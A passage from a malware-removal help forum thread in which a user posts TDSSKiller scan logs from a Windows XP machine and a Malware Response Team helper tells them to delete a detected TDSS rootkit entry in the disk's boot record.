20:17:25.0937 0x0ae0  [ C93C9FF7B04D772627A3646D89F7BF89, 805FA48E7A46D4F10240BF880A2468F53DEA36E83004399228AB70DB7D20544A ] IRENUM          C:\WINDOWS\system32\DRIVERS\irenum.sys
20:17:26.0187 0x0ae0  IRENUM - ok
20:17:26.0234 0x0ae0  [ 05A299EC56E52649B1CF2FC52D20F2D7, 2654619DB3E6D6C385B63AB02F87D4241C4F0250CC31383D1B3586917166C2DC ] isapnp          C:\WINDOWS\system32\DRIVERS\isapnp.sys
20:17:26.0468 0x0ae0  isapnp - ok
20:17:26.0593 0x0ae0  [ 9ECF00E19736054E019C532AED8228FC, F5A64A8269EA3655BBD4850298F335C0BD30535258928ED7CE62A32A3363E60B ] JavaQuickStarterService C:\Program Files\Java\jre7\bin\jqs.exe
20:17:26.0656 0x0ae0  JavaQuickStarterService - ok
20:17:26.0671 0x0ae0  [ 463C1EC80CD17420A542B7F36A36F128, E3B11BA26AFEAFB50B0FC168EA07F6049DA6B88BCDDEEE20310602D7FC27A3A7 ] Kbdclass        C:\WINDOWS\system32\DRIVERS\kbdclass.sys
20:17:27.0062 0x0ae0  Kbdclass - ok
20:17:27.0140 0x0ae0  [ 692BCF44383D056AED41B045A323D378, 1A99DEE83FFAF64E73067FC049C0A4CE07D94E4AE31EFA17B38CEFA9E41D67DC ] kmixer          C:\WINDOWS\system32\drivers\kmixer.sys
20:17:27.0312 0x0ae0  kmixer - ok
20:17:27.0343 0x0ae0  [ B467646C54CC746128904E1654C750C1, 3BD71BE3663EA23463D236D8A2A2E42DFA10C502BDB4B6E131FAF0FBA748219E ] KSecDD          C:\WINDOWS\system32\drivers\KSecDD.sys
20:17:27.0421 0x0ae0  KSecDD - ok
20:17:27.0453 0x0ae0  [ 3A7C3CBE5D96B8AE96CE81F0B22FB527, 0044F03132596A494448CCE5F3D6ECC12617BB4CF6BAE348F79D4DC40ACD6EE0 ] lanmanserver    C:\WINDOWS\System32\srvsvc.dll
20:17:27.0500 0x0ae0  lanmanserver - ok
20:17:27.0515 0x0ae0  [ A8888A5327621856C0CEC4E385F69309, B08B63300D824E35E31EEEA2C4C086DFA2C2A964CEDAE512E74D3D88AADAA2C1 ] lanmanworkstation C:\WINDOWS\System32\wkssvc.dll
20:17:27.0562 0x0ae0  lanmanworkstation - ok
20:17:27.0593 0x0ae0  [ A7DB739AE99A796D91580147E919CC59, EDF4E039BA277B0E6D66FEB0B28096E67D682C09DFC18ECECF062D9DCFB75ACF ] LmHosts         C:\WINDOWS\System32\lmhsvc.dll
20:17:27.0796 0x0ae0  LmHosts - ok
20:17:27.0828 0x0ae0  [ 986B1FF5814366D71E0AC5755C88F2D3, E6AF051174531C24B38E73987755D366ABEC595476C6D17793E8DCCC73F55340 ] Messenger       C:\WINDOWS\System32\msgsvc.dll
20:17:28.0015 0x0ae0  Messenger - ok
20:17:28.0031 0x0ae0  [ 4AE068242760A1FB6E1A44BF4E16AFA6, 1FB771162B96AAF787AC24867B818DF8511F0780BB094FA9A38C11D8DBFE68BC ] mnmdd           C:\WINDOWS\system32\drivers\mnmdd.sys
20:17:28.0203 0x0ae0  mnmdd - ok
20:17:28.0234 0x0ae0  [ D18F1F0C101D06A1C1ADF26EED16FCDD, BA0837C7780BD8262E143E2935AFA63BE59C3C39EF56CB8608EED0F50AF070D4 ] mnmsrvc         C:\WINDOWS\system32\mnmsrvc.exe
20:17:28.0406 0x0ae0  mnmsrvc - ok
20:17:28.0437 0x0ae0  [ DFCBAD3CEC1C5F964962AE10E0BCC8E1, B342CC9EC3729AB1AB4B5E2E99F890C1E0CA649162DE91F6768AB857B719E97B ] Modem           C:\WINDOWS\system32\drivers\Modem.sys
20:17:28.0609 0x0ae0  Modem - ok
20:17:28.0640 0x0ae0  [ 35C9E97194C8CFB8430125F8DBC34D04, 0C0FCE6B0A23FB0ECB92E1663E1C72D2DD5B177D82E04782957690B69530DB39 ] Mouclass        C:\WINDOWS\system32\DRIVERS\mouclass.sys
20:17:28.0812 0x0ae0  Mouclass - ok
20:17:28.0843 0x0ae0  [ B1C303E17FB9D46E87A98E4BA6769685, 161A45488522055D0F0474ABEDA04DDD0B5DAC2411AF9154B15190BBD66E7153 ] mouhid          C:\WINDOWS\system32\DRIVERS\mouhid.sys
20:17:29.0062 0x0ae0  mouhid - ok
20:17:29.0078 0x0ae0  [ A80B9A0BAD1B73637DBCBBA7DF72D3FD, 2A5E15ED2C24C6C65EF2F7E1FD93374774076C9D8D451E4422561F4D269C012F ] MountMgr        C:\WINDOWS\system32\drivers\MountMgr.sys
20:17:29.0265 0x0ae0  MountMgr - ok
20:17:29.0328 0x0ae0  [ 4E9D8041D352A33332FD6F59A3A78B03, D4E6229B07EF9866993EEE4F6223DC7F1FF1108273FE14A3DC74E65C181DE56A ] MozillaMaintenance C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
20:17:29.0906 0x0ae0  MozillaMaintenance - detected UnsignedFile.Multi.Generic ( 1 )
20:17:32.0562 0x0ae0  Detect skipped due to KSN trusted
20:17:32.0562 0x0ae0  MozillaMaintenance - ok
20:17:32.0640 0x0ae0  mraid35x - ok
20:17:32.0687 0x0ae0  [ 11D42BB6206F33FBB3BA0288D3EF81BD, 76ABCFB62C5AC549F58C231F72A99882CDEB74928104B77FE52554765C2B1A22 ] MRxDAV          C:\WINDOWS\system32\DRIVERS\mrxdav.sys
20:17:32.0890 0x0ae0  MRxDAV - ok
20:17:32.0937 0x0ae0  [ A137F1470499A205ABBB9AAFB3B6F2B1, FB4951727543030D9E6ED74149C3FAACE2CA9DA8C1B5F616301B30B858C724E8 ] MSDTC           C:\WINDOWS\system32\msdtc.exe
20:17:33.0125 0x0ae0  MSDTC - ok
20:17:33.0156 0x0ae0  [ C941EA2454BA8350021D774DAF0F1027, C940E978C7B66A713A0FDAB54B5F995DF59D089AFCD96221DD3222948CD49BBD ] Msfs            C:\WINDOWS\system32\drivers\Msfs.sys
20:17:33.0453 0x0ae0  Msfs - ok
20:17:33.0468 0x0ae0  MSIServer - ok
20:17:33.0500 0x0ae0  [ D1575E71568F4D9E14CA56B7B0453BF1, 4ABE0E24786C0D39FA2B885447E56204CA6942FB175E534DCE675D7BCF0B176A ] MSKSSRV         C:\WINDOWS\system32\drivers\MSKSSRV.sys
20:17:33.0703 0x0ae0  MSKSSRV - ok
20:17:33.0718 0x0ae0  [ 325BB26842FC7CCC1FCCE2C457317F3E, C07BE560513B1FB91D756494F0BA4AEEB2E1998DE0E1C21EE83DB1183B0CEE91 ] MSPCLOCK        C:\WINDOWS\system32\drivers\MSPCLOCK.sys
20:17:33.0875 0x0ae0  MSPCLOCK - ok
20:17:33.0890 0x0ae0  [ BAD59648BA099DA4A17680B39730CB3D, 9AD4C7C94C186C8815D0BC75DCAFB962158DA6935A244BA243EDDDEB33F9816C ] MSPQM           C:\WINDOWS\system32\drivers\MSPQM.sys
20:17:34.0062 0x0ae0  MSPQM - ok
20:17:34.0078 0x0ae0  [ AF5F4F3F14A8EA2C26DE30F7A1E17136, AC93A1E4ABB0D038B772E429015567E44CC2EDB66C54DBE23A5F98176FAC1520 ] mssmbios        C:\WINDOWS\system32\DRIVERS\mssmbios.sys
20:17:34.0234 0x0ae0  mssmbios - ok
20:17:34.0265 0x0ae0  [ DE6A75F5C270E756C5508D94B6CF68F5, FCC972DDC36C2C44D836913F10004C2C33B11C54DEFFF0C63E0FDF901D2F9261 ] Mup             C:\WINDOWS\system32\drivers\Mup.sys
20:17:34.0312 0x0ae0  Mup - ok
20:17:34.0359 0x0ae0  [ 0102140028FAD045756796E1C685D695, 5335B8278418CA200E2772124F0602C3E15A5CAF2D5CC59F6785DFAABF339B09 ] napagent        C:\WINDOWS\System32\qagentrt.dll
20:17:34.0625 0x0ae0  napagent - ok
20:17:34.0656 0x0ae0  [ 1DF7F42665C94B825322FAE71721130D, FE0DCB728471465B39A42A7511F4133021FBA5DF88F88BCB5FE2FF34CFD713F9 ] NDIS            C:\WINDOWS\system32\drivers\NDIS.sys
20:17:34.0812 0x0ae0  NDIS - ok
20:17:34.0859 0x0ae0  [ 0109C4F3850DFBAB279542515386AE22, 4F6DB1E499AC853FD36FD603FBB6D3AC9BDCEB298C7FE1FB59A9236CB46729B2 ] NdisTapi        C:\WINDOWS\system32\DRIVERS\ndistapi.sys
20:17:34.0875 0x0ae0  NdisTapi - ok
20:17:34.0921 0x0ae0  [ F927A4434C5028758A842943EF1A3849, B1AA3AF150C05307461774925901789456B0CCCD03A5E71ADA4AB58455962BEE ] Ndisuio         C:\WINDOWS\system32\DRIVERS\ndisuio.sys
20:17:35.0078 0x0ae0  Ndisuio - ok
20:17:35.0093 0x0ae0  [ EDC1531A49C80614B2CFDA43CA8659AB, 494042F790F33721328B4451E79842E21919681CC421A4F9633EC4D383E06097 ] NdisWan         C:\WINDOWS\system32\DRIVERS\ndiswan.sys
20:17:35.0250 0x0ae0  NdisWan - ok
20:17:35.0265 0x0ae0  [ 2F597BB467E05B1FE3830EABD821B8E0, 141497F5A49D47CCE3C9289644F4BD838DCB238F6D8E847FC006652E21FE02AC ] NDProxy         C:\WINDOWS\system32\drivers\NDProxy.sys
20:17:35.0312 0x0ae0  NDProxy - ok
20:17:35.0343 0x0ae0  [ A081CB6FB9A12668F233EB5414BE3A0E, EE2A1311B51D1FEBAF79F45E568A927D8EA7704AFC8495AED2D26927566F61E3 ] Net Driver HPZ12 C:\WINDOWS\system32\HPZinw12.dll
20:17:35.0343 0x0ae0  Net Driver HPZ12 - detected UnsignedFile.Multi.Generic ( 1 )
20:17:38.0375 0x0ae0  Detect skipped due to KSN trusted
20:17:38.0375 0x0ae0  Net Driver HPZ12 - ok
20:17:38.0390 0x0ae0  [ 5D81CF9A2F1A3A756B66CF684911CDF0, 7989C36607CAEA17AFA2C1C9904145CA0714A54B9F712D9D4C1AB140D0B2CC0C ] NetBIOS         C:\WINDOWS\system32\DRIVERS\netbios.sys
20:17:38.0656 0x0ae0  NetBIOS - ok
20:17:38.0703 0x0ae0  [ 74B2B2F5BEA5E9A3DC021D685551BD3D, 7932B71F98B4122BE88F576BF6D745A757AE378A48924B7F4358837B75640A82 ] NetBT           C:\WINDOWS\system32\DRIVERS\netbt.sys
20:17:38.0921 0x0ae0  NetBT - ok
20:17:38.0984 0x0ae0  [ B857BA82860D7FF85AE29B095645563B, 86FF0E4CDD9C394E8BABD93A4D57E73FF9A779261717DEC6E9CDE99F1C6B0F4C ] NetDDE          C:\WINDOWS\system32\netdde.exe
20:17:39.0140 0x0ae0  NetDDE - ok
20:17:39.0171 0x0ae0  [ B857BA82860D7FF85AE29B095645563B, 86FF0E4CDD9C394E8BABD93A4D57E73FF9A779261717DEC6E9CDE99F1C6B0F4C ] NetDDEdsdm      C:\WINDOWS\system32\netdde.exe
20:17:39.0312 0x0ae0  NetDDEdsdm - ok
20:17:39.0343 0x0ae0  [ A4ABB21D13528D1BA3ABF484B2DF24FE, 2DC5CFB023D990FD5680859660108EA80FB320A882C5B4BBAA3A061D7C870F46 ] netfilter       C:\WINDOWS\system32\drivers\netfilter.sys
20:17:39.0375 0x0ae0  netfilter - detected UnsignedFile.Multi.Generic ( 1 )
20:17:42.0031 0x0ae0  Detect skipped due to KSN trusted
20:17:42.0031 0x0ae0  netfilter - ok
20:17:42.0062 0x0ae0  [ BF2466B3E18E970D8A976FB95FC1CA85, F7794B5D12DC5D820A162850F4388E2AA80426AD07CB221799CF941C682AB501 ] Netlogon        C:\WINDOWS\system32\lsass.exe
20:17:42.0234 0x0ae0  Netlogon - ok
20:17:42.0265 0x0ae0  [ 13E67B55B3ABD7BF3FE7AAE5A0F9A9DE, 4E0A67B3CC897E80D4B342FFE8B7B4CC4F6CA2EF2D34C136027A098B2E1C6166 ] Netman          C:\WINDOWS\System32\netman.dll
20:17:42.0453 0x0ae0  Netman - ok
20:17:42.0484 0x0ae0  [ D34612C5D02D026535B3095D620626AE, 1BBCCCBF49EB8807240A77DCB43C25C21682073CC5356594E2C4F53EF36BF657 ] NetTcpPortSharing C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
20:17:42.0515 0x0ae0  NetTcpPortSharing - ok
20:17:42.0546 0x0ae0  [ E9E47CFB2D461FA0FC75B7A74C6383EA, 544136F5BFD4DC23D45E90F12FA48B82FD9EAEA9EAF3E0F5F0BD27E23D672C3E ] NIC1394         C:\WINDOWS\system32\DRIVERS\nic1394.sys
20:17:42.0703 0x0ae0  NIC1394 - ok
20:17:42.0750 0x0ae0  [ 943337D786A56729263071623BBB9DE5, B631B47C869FE4ACF46E4AA272435D9A9CA536E3349E3FFBB8602636FEE7AFD4 ] Nla             C:\WINDOWS\System32\mswsock.dll
20:17:42.0812 0x0ae0  Nla - ok
20:17:42.0843 0x0ae0  [ 3182D64AE053D6FB034F44B6DEF8034A, 4ADFC76965BA2A5F488E71789A4E4EA702A74AF42725F72130D1CA919406CF19 ] Npfs            C:\WINDOWS\system32\drivers\Npfs.sys
20:17:42.0984 0x0ae0  Npfs - ok
20:17:43.0031 0x0ae0  [ 78A08DD6A8D65E697C18E1DB01C5CDCA, E0E6F3ED05068E32F1D5C2D2B38CDEF4536B8656DB6756C66CF6B40B60C8F3DA ] Ntfs            C:\WINDOWS\system32\drivers\Ntfs.sys
20:17:43.0218 0x0ae0  Ntfs - ok
20:17:43.0234 0x0ae0  [ 7F1C1F78D709C4A54CBB46EDE7E0B48D, 52135D41983A9E9E1DCA250A63017076AE22AA06D77CCF2E5EF41154F958584A ] NTIDrvr         C:\WINDOWS\system32\DRIVERS\NTIDrvr.sys
20:17:43.0250 0x0ae0  NTIDrvr - detected UnsignedFile.Multi.Generic ( 1 )
20:17:46.0156 0x0ae0  Detect skipped due to KSN trusted
20:17:46.0156 0x0ae0  NTIDrvr - ok
20:17:46.0171 0x0ae0  [ BF2466B3E18E970D8A976FB95FC1CA85, F7794B5D12DC5D820A162850F4388E2AA80426AD07CB221799CF941C682AB501 ] NtLmSsp         C:\WINDOWS\system32\lsass.exe
20:17:46.0343 0x0ae0  NtLmSsp - ok
20:17:46.0375 0x0ae0  [ 156F64A3345BD23C600655FB4D10BC08, 9611BE411586E068D9297D77102DB3BE48AA67F1BAD6F61A84F83FC3043FA9CD ] NtmsSvc         C:\WINDOWS\system32\ntmssvc.dll
20:17:46.0546 0x0ae0  NtmsSvc - ok
20:17:46.0578 0x0ae0  [ 73C1E1F395918BC2C6DD67AF7591A3AD, B21133A75253EC15E2DFF66D3B480AB1A7E1A2360476C810E7AA55D0F0EB08D4 ] Null            C:\WINDOWS\system32\drivers\Null.sys
20:17:46.0718 0x0ae0  Null - ok
20:17:46.0750 0x0ae0  [ B305F3FAD35083837EF46A0BBCE2FC57, 9D0E0E666D652D0FC9EAB97280A5D67AAF61D6B21929DF7CF8ED72A367720464 ] NwlnkFlt        C:\WINDOWS\system32\DRIVERS\nwlnkflt.sys
20:17:46.0890 0x0ae0  NwlnkFlt - ok
20:17:46.0921 0x0ae0  [ C99B3415198D1AAB7227F2C88FD664B9, DD8DA4B5E804F134AB9233859544C025062902DFC3E8FB8A09A67337A4E73F55 ] NwlnkFwd        C:\WINDOWS\system32\DRIVERS\nwlnkfwd.sys
20:17:47.0062 0x0ae0  NwlnkFwd - ok
20:17:47.0187 0x0ae0  [ 785F487A64950F3CB8E9F16253BA3B7B, 02445344BD214370A6D48B1CA04921D8EFCB13E676B5648266DD0E076C0822B6 ] odserv          C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE
20:17:47.0218 0x0ae0  odserv - ok
20:17:47.0265 0x0ae0  [ CA33832DF41AFB202EE7AEB05145922F, 9DD0089C2E13C7F81214C3B5A4A61276292052F9BBFEA7FCD0F6AA27815D5F95 ] ohci1394        C:\WINDOWS\system32\DRIVERS\ohci1394.sys
20:17:47.0421 0x0ae0  ohci1394 - ok
20:17:47.0437 0x0ae0  [ 5A432A042DAE460ABE7199B758E8606C, 6E5D1F477D290905BE27CEBF9572BAC6B05FFEF2FAD901D3C8E11F665F8B9A71 ] ose             C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
20:17:47.0468 0x0ae0  ose - ok
20:17:47.0515 0x0ae0  [ 5575FAF8F97CE5E713D108C2A58D7C7C, 96D4595D19A78CCBE8B325A08780AC077AE5CC99642ACD72FB47AEAE8D344D3B ] Parport         C:\WINDOWS\system32\DRIVERS\parport.sys
20:17:47.0656 0x0ae0  Parport - ok
20:17:47.0687 0x0ae0  [ BEB3BA25197665D82EC7065B724171C6, 7E71C13BA30CD95CEE8A9CC85E6F48A01F30EDEAADEE69D80AE828BF97E5A5CA ] PartMgr         C:\WINDOWS\system32\drivers\PartMgr.sys
20:17:47.0843 0x0ae0  PartMgr - ok
20:17:47.0875 0x0ae0  [ 70E98B3FD8E963A6A46A2E6247E0BEA1, 6771313EC41B3B5BFD398F60706E40BE71617046880CC352DD110B001AFC22A1 ] ParVdm          C:\WINDOWS\system32\drivers\ParVdm.sys
20:17:48.0000 0x0ae0  ParVdm - ok
20:17:48.0015 0x0ae0  [ A219903CCF74233761D92BEF471A07B1, D4E6C360A1D2FCA4D17C991B834D68BF20F5111DD06B1FAB8B22984804CEC269 ] PCI             C:\WINDOWS\system32\DRIVERS\pci.sys
20:17:48.0171 0x0ae0  PCI - ok
20:17:48.0187 0x0ae0  [ CCF5F451BB1A5A2A522A76E670000FF0, D63F7E5A39653EC9CCE94B7D84B2D3EBD4F54533BD65701020198724042C9257 ] PCIIde          C:\WINDOWS\system32\DRIVERS\pciide.sys
20:17:48.0328 0x0ae0  PCIIde - ok
20:17:48.0359 0x0ae0  [ 9E89EF60E9EE05E3F2EEF2DA7397F1C1, 0BA3DB21DC7C641C181E2635B5C9B73965FDCDCD3EBBBE48FCFEC1C8C987F617 ] Pcmcia          C:\WINDOWS\system32\drivers\Pcmcia.sys
20:17:48.0515 0x0ae0  Pcmcia - ok
20:17:48.0515 0x0ae0  perc2 - ok
20:17:48.0515 0x0ae0  perc2hib - ok
20:17:48.0562 0x0ae0  [ 65DF52F5B8B6E9BBD183505225C37315, 59C606977DB40A3443DFF0BE2A4C761824881B22C9FDB3D23F6486DB580E92A4 ] PlugPlay        C:\WINDOWS\system32\services.exe
20:17:48.0593 0x0ae0  PlugPlay - ok
20:17:48.0625 0x0ae0  [ 65BC271F337637731D3C71455AE1F476, DAD32B61FE0147F8D2DA4C8F016920CD6BB2098F16E3CC2768009763E71DEFBC ] Pml Driver HPZ12 C:\WINDOWS\system32\HPZipm12.dll
20:17:48.0656 0x0ae0  Pml Driver HPZ12 - detected UnsignedFile.Multi.Generic ( 1 )
20:17:51.0203 0x0ae0  Detect skipped due to KSN trusted
20:17:51.0203 0x0ae0  Pml Driver HPZ12 - ok
20:17:51.0218 0x0ae0  [ BF2466B3E18E970D8A976FB95FC1CA85, F7794B5D12DC5D820A162850F4388E2AA80426AD07CB221799CF941C682AB501 ] PolicyAgent     C:\WINDOWS\system32\lsass.exe
20:17:51.0390 0x0ae0  PolicyAgent - ok
20:17:51.0390 0x0ae0  [ EFEEC01B1D3CF84F16DDD24D9D9D8F99, C5F0C8C66A3AF7E7BB04CEDE4AC5306F8387AB384A2107DC5BE413AAE968EFF1 ] PptpMiniport    C:\WINDOWS\system32\DRIVERS\raspptp.sys
20:17:51.0531 0x0ae0  PptpMiniport - ok
20:17:51.0546 0x0ae0  [ BF2466B3E18E970D8A976FB95FC1CA85, F7794B5D12DC5D820A162850F4388E2AA80426AD07CB221799CF941C682AB501 ] ProtectedStorage C:\WINDOWS\system32\lsass.exe
20:17:51.0671 0x0ae0  ProtectedStorage - ok
20:17:51.0703 0x0ae0  [ 09298EC810B07E5D582CB3A3F9255424, 35473A1BE25AC289474090EB0806AC6B3035DC33D1F3DF97A14BF1E361AC6AC3 ] PSched          C:\WINDOWS\system32\DRIVERS\psched.sys
20:17:51.0843 0x0ae0  PSched - ok
20:17:51.0875 0x0ae0  [ 00B670D8A36C7134CFC66B446A18CC92, 4D9DAEE5C9AED4AC6622AB8EFA634FE1E525B604604B5D655533DB4579964B62 ] psdfilter       C:\WINDOWS\system32\Drivers\psdfilter.sys
20:17:51.0890 0x0ae0  psdfilter - detected UnsignedFile.Multi.Generic ( 1 )
20:17:54.0515 0x0ae0  Detect skipped due to KSN trusted
20:17:54.0515 0x0ae0  psdfilter - ok
20:17:54.0546 0x0ae0  [ E9A60343CB7C39090638B1DD574F26EB, 52632F9E16C3B2BDF054D6AFB9BFF0FCD81F399669819C092D95128ED4D14BE0 ] psdvdisk        C:\WINDOWS\system32\Drivers\psdvdisk.sys
20:17:54.0546 0x0ae0  psdvdisk - detected UnsignedFile.Multi.Generic ( 1 )
20:17:57.0500 0x0ae0  Detect skipped due to KSN trusted
20:17:57.0500 0x0ae0  psdvdisk - ok
20:17:57.0531 0x0ae0  [ 80D317BD1C3DBC5D4FE7B1678C60CADD, DA76804B55D0CAB3DDD01EFC06673764AE4860693375C658B6063FB14AF7F12C ] Ptilink         C:\WINDOWS\system32\DRIVERS\ptilink.sys
20:17:57.0703 0x0ae0  Ptilink - ok
20:17:57.0703 0x0ae0  ql1080 - ok
20:17:57.0718 0x0ae0  Ql10wnt - ok
20:17:57.0718 0x0ae0  ql12160 - ok
20:17:57.0734 0x0ae0  ql1240 - ok
20:17:57.0734 0x0ae0  ql1280 - ok
20:17:57.0750 0x0ae0  [ FE0D99D6F31E4FAD8159F690D68DED9C, 998685622ABE631984B7E4DBF91AB3594B1F574378D75EB9F6265F4650470692 ] RasAcd          C:\WINDOWS\system32\DRIVERS\rasacd.sys
20:17:57.0875 0x0ae0  RasAcd - ok
20:17:57.0906 0x0ae0  [ AD188BE7BDF94E8DF4CA0A55C00A5073, C7D76CB579FAEBCCC2873499441BACDD6BD6668ACF5ED7F31862656E96E2B20C ] RasAuto         C:\WINDOWS\System32\rasauto.dll
20:17:58.0062 0x0ae0  RasAuto - ok
20:17:58.0093 0x0ae0  [ 11B4A627BC9614B885C4969BFA5FF8A6, EAE0A412A2B0F68919C32A96B3A08CC1A06585E4998819F5C9051745F63FF5AD ] Rasl2tp         C:\WINDOWS\system32\DRIVERS\rasl2tp.sys
20:17:58.0234 0x0ae0  Rasl2tp - ok
20:17:58.0265 0x0ae0  [ 76A9A3CBEADD68CC57CDA5E1D7448235, 4AFD048C5D2306AB8DE46F3AA60AC0213333DDA3B09A9E91F7585DB6EB978EC8 ] RasMan          C:\WINDOWS\System32\rasmans.dll
20:17:58.0406 0x0ae0  RasMan - ok
20:17:58.0437 0x0ae0  [ 5BC962F2654137C9909C3D4603587DEE, A5CE5653D0105240F5E86CFAAB89E7917D42D939E2F27A5A7D6979289CA651B8 ] RasPppoe        C:\WINDOWS\system32\DRIVERS\raspppoe.sys
20:17:58.0578 0x0ae0  RasPppoe - ok
20:17:58.0609 0x0ae0  [ FDBB1D60066FCFBB7452FD8F9829B242, 10A2DACF944BD000032EBA8C095CB3D879CC55B28C377ADF6E52E508E47444DB ] Raspti          C:\WINDOWS\system32\DRIVERS\raspti.sys
20:17:58.0734 0x0ae0  Raspti - ok
20:17:58.0781 0x0ae0  [ 7AD224AD1A1437FE28D89CF22B17780A, 6645235CA27D671954E3557FA37082881C3D7D47492C71264CD8CB8D108EC801 ] Rdbss           C:\WINDOWS\system32\DRIVERS\rdbss.sys
20:17:58.0937 0x0ae0  Rdbss - ok
20:17:58.0953 0x0ae0  [ 4912D5B403614CE99C28420F75353332, 975341ECD660209987B5E5171B8315E032439E408CBE8A5986E67AF767F373BB ] RDPCDD          C:\WINDOWS\system32\DRIVERS\RDPCDD.sys
20:17:59.0093 0x0ae0  RDPCDD - ok
20:17:59.0125 0x0ae0  [ 15CABD0F7C00C47C70124907916AF3F1, 66B5C978B7FB6359AD8BAC9F568FE9D469E358FEAB07B1F129BA9E85F1DF723E ] rdpdr           C:\WINDOWS\system32\DRIVERS\rdpdr.sys
20:17:59.0281 0x0ae0  rdpdr - ok
20:17:59.0312 0x0ae0  [ 43AF5212BD8FB5BA6EED9754358BD8F7, AF330F61CECA4AFA359CEABC5EB3227E6B56A9A2DCE50701381D665122D7356D ] RDPWD           C:\WINDOWS\system32\drivers\RDPWD.sys
20:17:59.0359 0x0ae0  RDPWD - ok
20:17:59.0390 0x0ae0  [ 3C37BF86641BDA977C3BF8A840F3B7FA, AB9A6E54DBA3F4561CD4837372BECCE0D73943D02E3288F944333039375AC08C ] RDSessMgr       C:\WINDOWS\system32\sessmgr.exe
20:17:59.0546 0x0ae0  RDSessMgr - ok
20:17:59.0578 0x0ae0  [ F828DD7E1419B6653894A8F97A0094C5, E6150E1F598BA4CFEDB8FF075BC0D576518C331B864388F1CAE8812EFF106ECF ] redbook         C:\WINDOWS\system32\DRIVERS\redbook.sys
20:17:59.0921 0x0ae0  redbook - ok
20:17:59.0968 0x0ae0  [ 7E699FF5F59B5D9DE5390E3C34C67CF5, 3FCF0442D80AB181FED4303E570378736AA1F8718C0B8B70F689A1E45200FFE4 ] RemoteAccess    C:\WINDOWS\System32\mprdim.dll
20:18:00.0125 0x0ae0  RemoteAccess - ok
20:18:00.0156 0x0ae0  [ 5B19B557B0C188210A56A6B699D90B8F, 0FA880B81AE615206FD1738B83428AAA491D54B24168339DE6E87FDE8C6C14B0 ] RemoteRegistry  C:\WINDOWS\system32\regsvc.dll
20:18:00.0312 0x0ae0  RemoteRegistry - ok
20:18:00.0328 0x0ae0  [ D8B0B4ADE32574B2D9C5CC34DC0DBBE7, CDF10D3D8ADA7ADB1CC1567BFA986557C6D69F4099B70FDFABD4C3D09E3CA778 ] ROOTMODEM       C:\WINDOWS\system32\Drivers\RootMdm.sys
20:18:00.0468 0x0ae0  ROOTMODEM - ok
20:18:00.0500 0x0ae0  [ AAED593F84AFA419BBAE8572AF87CF6A, CC0FFC5A69394C8830DC66320DA01A820BBF41AD7E57D0FC343561DC5EF9A360 ] RpcLocator      C:\WINDOWS\system32\locator.exe
20:18:00.0656 0x0ae0  RpcLocator - ok
20:18:00.0687 0x0ae0  [ 6B27A5C03DFB94B4245739065431322C, 6AEAC16AB4E0DFD25123AAF4D4181FEE1B919B7B2793117006CE8CF30E826CFD ] RpcSs           C:\WINDOWS\System32\rpcss.dll
20:18:00.0718 0x0ae0  RpcSs - ok
20:18:00.0750 0x0ae0  [ 471B3F9741D762ABE75E9DEEA4787E47, D9ADE42965EC22AEB4B2AD21D429C3C8232A60AA9853DEFDA7AED86A13FE8623 ] RSVP            C:\WINDOWS\system32\rsvp.exe
20:18:00.0906 0x0ae0  RSVP - ok
20:18:00.0921 0x0ae0  [ BF2466B3E18E970D8A976FB95FC1CA85, F7794B5D12DC5D820A162850F4388E2AA80426AD07CB221799CF941C682AB501 ] SamSs           C:\WINDOWS\system32\lsass.exe
20:18:01.0062 0x0ae0  SamSs - ok
20:18:01.0093 0x0ae0  [ 39763504067962108505BFF25F024345, 73C9710B61EDC7FBEDE1D7A767AA3D3A169E7AD012494D05CB5EE7E5C5752BB9 ] SASDIFSV        C:\Program Files\SUPERAntiSpyware\SASDIFSV.SYS
20:18:01.0109 0x0ae0  SASDIFSV - ok
20:18:01.0109 0x0ae0  [ 77B9FC20084B48408AD3E87570EB4A85, B5BC5FEC1356DECB66A7A671DB67112BDAC8F942BF1C4B986B1805B41EF362B1 ] SASKUTIL        C:\Program Files\SUPERAntiSpyware\SASKUTIL.SYS
20:18:01.0125 0x0ae0  SASKUTIL - ok
20:18:17.0875 0x0ae0  ================ Scan MBR ==================================
20:18:17.0890 0x0ae0  [ 99852D5C3A78447C3D6D82B6155FE848 ] \Device\Harddisk0\DR0
20:18:20.0812 0x0ae0  \Device\Harddisk0\DR0 - detected TDSS File System ( 1 )
20:18:20.0812 0x0ae0  \Device\Harddisk0\DR0 ( TDSS File System ) - warning
20:18:23.0453 0x0ae0  ================ Scan VBR ==================================
20:18:23.0468 0x0ae0  [ BA29F0665A0180B8388AD44A01EA69CE ] \Device\Harddisk0\DR0\Partition1
20:18:23.0484 0x0ae0  \Device\Harddisk0\DR0\Partition1 - ok
20:18:23.0484 0x0ae0  [ 401421E6791BC0E8EC72D2953AB78FCC ] \Device\Harddisk0\DR0\Partition2
20:18:23.0500 0x0ae0  \Device\Harddisk0\DR0\Partition2 - ok
20:18:56.0265 0x0ae0  Win FW state via NFM: disabled
20:18:58.0906 0x0ae0  ============================================================
20:18:58.0906 0x0ae0  Scan finished
20:18:58.0906 0x0ae0  ============================================================
20:18:58.0921 0x0928  Detected object count: 1
20:18:58.0921 0x0928  Actual detected object count: 1
20:19:50.0562 0x0928  \Device\Harddisk0\DR0 ( TDSS File System ) - skipped by user
20:19:50.0562 0x0928  \Device\Harddisk0\DR0 ( TDSS File System ) - User select action: Skip

Thank you!!

RG

#12 Starbuck

  • Malware Response Team

Posted 10 September 2014 - 02:09 PM

Hi rockgremlin

Please rerun TDSSKiller and select Delete for the following:

20:19:50.0562 0x0928 \Device\Harddisk0\DR0 ( TDSS File System )

Rerun TDSSKiller yet another time and post the results.

Thanks


#13 rockgremlin

Posted 22 September 2014 - 02:25 PM

OK, reran TDSSKiller, and deleted that one remaining threat. The following are the scan results after running it one last time:

13:13:49.0812 0x0780  TDSS rootkit removing tool 3.0.0.40 Jul 10 2014 12:37:58
13:13:54.0406 0x0780  ============================================================
13:13:54.0406 0x0780  Current date / time: 2014/09/22 13:13:54.0406
13:13:54.0406 0x0780  SystemInfo:
13:13:54.0406 0x0780  
13:13:54.0406 0x0780  OS Version: 5.1.2600 ServicePack: 3.0
13:13:54.0406 0x0780  Product type: Workstation
13:13:54.0406 0x0780  ComputerName: MOLES
13:13:54.0406 0x0780  UserName: Jay
